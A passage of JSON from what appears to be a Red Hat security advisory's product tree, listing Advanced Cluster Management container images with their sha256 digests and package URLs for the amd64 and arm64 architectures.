"purl": "pkg:oci/grafana-dashboard-loader-rhel9@sha256%3A45a3b742df7e286cbf840e32285b281803f9e97f579af9721f9f9ae00bd2c824?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-client-rhel9@sha256:d978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-client-rhel9@sha256%3Ad978057f781d3ef887909cab4211f892017e76de317f3d2f17cd6314ec883939?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"product_id": "registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:e3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997_amd64",
"product_identification_helper": {
"purl": "pkg:oci/insights-metrics-rhel9@sha256%3Ae3d2d1e3d4467a8ee296180442f093643d07e2fe1f9c99b683ea69942d53c997?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"product_id": "registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/klusterlet-addon-controller-rhel9@sha256%3A1b56fc6c4b897bb8a62b1fa176af6bace8282b2de38e3e69b5673c5ae3e6848c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-rbac-proxy-rhel9@sha256%3A9f7cc4bc6e4019ec9b9e9b72f469902e54befa09560c1d1a1928ab1de5716ce1?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"product_id": "registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541_amd64",
"product_identification_helper": {
"purl": "pkg:oci/kube-state-metrics-rhel9@sha256%3A76718e6fe4d575e6348dac6ebc9a892cc1dd7da3b762cbd8965bd339862e5541?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"product_id": "registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2_amd64",
"product_identification_helper": {
"purl": "pkg:oci/memcached-exporter-rhel9@sha256%3Ab19fbb7547999ff5e4144eebf4f57e8c3d310ae8f4b901a47d80b098cccb30b2?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"product_id": "registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8_amd64",
"product_identification_helper": {
"purl": "pkg:oci/metrics-collector-rhel9@sha256%3A2ed7d15730c178aad5f3d7838f347f540e3f710e414c78af82f0715d57b7a9f8?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"product_id": "registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:b2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicloud-integrations-rhel9@sha256%3Ab2bf3ec7254afae3ff1fb0713e336cd4b58fc734f6439ccdc0bb659e939db885?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-multicluster-observability-addon-rhel9@sha256:f534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-multicluster-observability-addon-rhel9@sha256%3Af534b88cb3db85b58b6f48ef64c433c673d422bf41d09fd303ffb5d7091a3b34?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:cab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-observability-rhel9-operator@sha256%3Acab194af8737d2a74ccf5c7ae6d192651e97ffec64625f7508c53a5094407769?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-application-rhel9@sha256%3A1eaf7740de439ed0f26e7abe5186d6422ad0304e7f7a62ff8f7d8b20d7b5f0ef?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:b535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-channel-rhel9@sha256%3Ab535b044f4233c17aa133a1e457424a9999369284a3a91ff61bc04a798079295?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"product_id": "registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:d90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf_amd64",
"product_identification_helper": {
"purl": "pkg:oci/multicluster-operators-subscription-rhel9@sha256%3Ad90541f7b7746118a800776cfe26ccfffb99862bdcda46b4ddabb1669d22f7cf?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-must-gather-rhel9@sha256%3A280faedc5f26616bd0614c1f20851d3642ee134e66e1da57cac81484a48cee11?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"product_id": "registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec_amd64",
"product_identification_helper": {
"purl": "pkg:oci/node-exporter-rhel9@sha256%3A6c9da700984d3199a85792c6eabfb36501843abf79f14d1a1312cb8b195100ec?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9@sha256:44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9@sha256%3A44b5c9b82ab30240cff679ced486e1d0660722992375065e7a997a29807c220f?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"product_id": "registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05_amd64",
"product_identification_helper": {
"purl": "pkg:oci/observatorium-rhel9-operator@sha256%3A84a20b1a3c8240b9535975d2266a84eab22ddd6bba9c11aa8aaea5bf542b6c05?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-rhel9@sha256:5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-rhel9@sha256%3A5f7390b5f48371553c718dd00dc51fd646d57994f299b1ac6d80ae3be1d4591f?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"product_id": "registry.redhat.io/rhacm2/prometheus-alertmanager-rhel9@sha256:36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/prometheus-alertmanager-rhel9@sha256%3A36871ffe49e522c8f838fd804675bca1fb325d94cef2abdc03650b0754fee4e7?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-config-reloader-rhel9@sha256%3A66774f0dd04cd3f3f8939e60cc89c98f2a9082f3617999d1c2a3e46ae461f7e7?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-prometheus-rhel9@sha256%3A91c016b3065808ddbceea1d6358a3a6c79480e41cdfe98e0f210af9dedb7a4ca?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"product_id": "registry.redhat.io/rhacm2/rbac-query-proxy-rhel9@sha256:82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de_amd64",
"product_identification_helper": {
"purl": "pkg:oci/rbac-query-proxy-rhel9@sha256%3A82f99122cfc73a9f43ab1f03ffb819bf8a0eccfa07bfebb145fdb883a36f03de?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"product_id": "registry.redhat.io/rhacm2/search-collector-rhel9@sha256:b7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636_amd64",
"product_identification_helper": {
"purl": "pkg:oci/search-collector-rhel9@sha256%3Ab7c83aef590284b867aa6050b5c206a7b81a2a2dfad8477cbc3b143e368c3636?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-indexer-rhel9@sha256%3A7fdb6e7d3859f06c4e6685853ae34f74f99daac5ba70ae2c3692bc7202a12c8c?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-api-rhel9@sha256%3A9726ba85bc1d7ec79758e46d6f28ae8ecacd6d1be21c56af9b795aa15bd07f7e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-search-v2-rhel9@sha256%3A5f225c8b7cec9c965cdfefdfcc34371b1dbd3a39d1e6a74f121ef9feffcb4f11?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:d47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-siteconfig-rhel9@sha256%3Ad47624803ffd462eacd0454c07ba5f000cd1e0e6658c595b936eca5441f49a1e?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"product_id": "registry.redhat.io/rhacm2/submariner-addon-rhel9@sha256:865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39_amd64",
"product_identification_helper": {
"purl": "pkg:oci/submariner-addon-rhel9@sha256%3A865e35a99ab1efd55b6cec986cc170859baf895306bf86c730f818f51b548b39?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-rhel9@sha256:99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-rhel9@sha256%3A99faf43dc00f23f4cb981423d25b66848ddae927912f99078cc567afeb2a7191?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"product_id": "registry.redhat.io/rhacm2/thanos-receive-controller-rhel9@sha256:0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43_amd64",
"product_identification_helper": {
"purl": "pkg:oci/thanos-receive-controller-rhel9@sha256%3A0016866635c4b9a24072275ec416ecc38df049edcea177611a12d1aef4394b43?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"product_id": "registry.redhat.io/rhacm2/acm-volsync-addon-controller-rhel9@sha256:0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc_amd64",
"product_identification_helper": {
"purl": "pkg:oci/acm-volsync-addon-controller-rhel9@sha256%3A0fcfb11a3e8fd162b15b81bb5133549e8f21139ade68e4a66f0d1f216edc09bc?arch=amd64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
}
],
"category": "architecture",
"name": "amd64"
},
{
"branches": [
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:f8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cli-rhel9@sha256%3Af8b6b891e5a948fc03983b2f40bee3eb312e5bef80b2a35fc502d28ed96e1c93?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"product_id": "registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:fee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cert-policy-controller-rhel9@sha256%3Afee7a4ef5d73d6e81e0b913a0c15ed8254f138ba8115fae8c3819a2cc6144fdc?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"product_id": "registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cluster-backup-rhel9-operator@sha256%3A9aa65853e2ab9469cbce3dc8dd5b40c6a19f844c2f07eb2657639b56afdc6b3b?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"product_id": "registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/acm-cluster-permission-rhel9@sha256%3A05847c2e995e681bdcc3f809e76f512767f40ac4498c14fad4afb4cae83f33d1?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"product_id": "registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1_arm64",
"product_identification_helper": {
"purl": "pkg:oci/config-policy-controller-rhel9@sha256%3A857f48a392757a6fec8a26bddc7bccffa463c33c5824bf8a809784e5b06f9cb1?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"product": {
"name": "registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"product_id": "registry.redhat.io/rhacm2/console-rhel9@sha256:86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7_arm64",
"product_identification_helper": {
"purl": "pkg:oci/console-rhel9@sha256%3A86c711091d0a954427d4dcd667cee8feda6dbc6fa2616de9f3316750b04c27e7?arch=arm64\u0026repository_url=registry.redhat.io/rhacm2"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:3fd793aaa8b22670c9a863613bd20e1fbbd946b8a15bc684bb952364d98a0c28_arm64",
"product": {
